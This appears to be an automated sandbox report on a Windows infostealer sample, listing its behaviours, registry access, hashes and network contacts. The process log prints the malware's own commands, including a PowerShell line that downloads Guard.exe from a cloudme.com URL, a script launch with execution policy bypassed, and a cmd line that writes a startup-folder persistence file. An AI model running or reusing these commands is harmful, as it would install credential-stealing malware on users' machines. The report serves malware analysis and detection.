Malware Analysis Report

2025-05-28 18:49

Sample ID 241117-c3yjpayhmd
Target e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags
collection discovery execution spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172 was found to be: Known bad.

Malicious Activity Summary

collection discovery execution spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks installed software on the system

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Drops file in System32 directory

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

outlook_office_path

Checks processor information in registry

outlook_win_path

Suspicious use of FindShellTrayWindow

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 02:36

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 02:36

Reported

2024-11-17 02:39

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target Count
PID 1424 created 3548 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE 2
PID 1508 created 3548 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE 1

Blocklisted process makes network request

Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A 1

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target Count
N/A N/A C:\Users\Public\Guard.exe N/A 1
N/A N/A C:\Users\Public\jsc.exe N/A 2

Loads dropped DLL

Description Indicator Process Target Count
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A 2

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1508 set thread context of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target Count
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A 1
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A 2
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A 2
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 1
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A 1

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2\Blob = [certificate blob omitted] C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D2712372EE1B3DE6DF260CAA5E2803763B5A36D2 C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 4
N/A N/A C:\Users\Public\Guard.exe N/A 22
N/A N/A C:\Users\Public\jsc.exe N/A 1
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A 8

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A 2
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A 2
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A 1

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 4780 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 4780 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 4784 wrote to memory of 1424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe 3
PID 1424 wrote to memory of 4072 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe 3
PID 1424 wrote to memory of 1508 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe 5
PID 1508 wrote to memory of 400 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe 14
PID 400 wrote to memory of 4444 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe 3
PID 4444 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe 3
PID 400 wrote to memory of 4612 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe 3

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 400 -ip 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2028

Network

Country Destination Domain Proto
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:17227 tcp
N/A 127.0.0.1:17227 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y5dkh3dj.1tb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Ireqseuphty

MD5 ab893875d697a3145af5eed5309bee26
SHA1 c90116149196cbf74ffb453ecb3b12945372ebfa
SHA256 02b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA512 6b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc

C:\Users\Admin\AppData\Local\Temp\Ruieetteer

MD5 013b18b14247306181ec7ae01d24aa15
SHA1 5ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256 edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA512 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 02:36

Reported

2024-11-17 02:39

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files
